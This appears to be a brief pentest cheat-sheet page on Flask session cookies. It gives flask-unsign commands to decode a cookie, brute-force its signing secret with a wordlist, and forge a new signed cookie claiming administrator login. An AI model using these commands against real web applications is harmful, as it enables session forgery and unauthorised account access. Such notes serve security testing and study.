726 B

Raw Blame History

Flask Cookies

They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key. Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.

Using flask-unsign this can be done via

flask-unsign --decode --cookie '<COOKIE>'

Unsigning the cookie can be done in the following way

flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval

Siging the cookie can be done via

flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'

726 B Raw Blame History

Flask Cookies

Read Flask Cookie

Unsign the Flask Cookie

Sign the Flask Cookie

726 B

Raw Blame History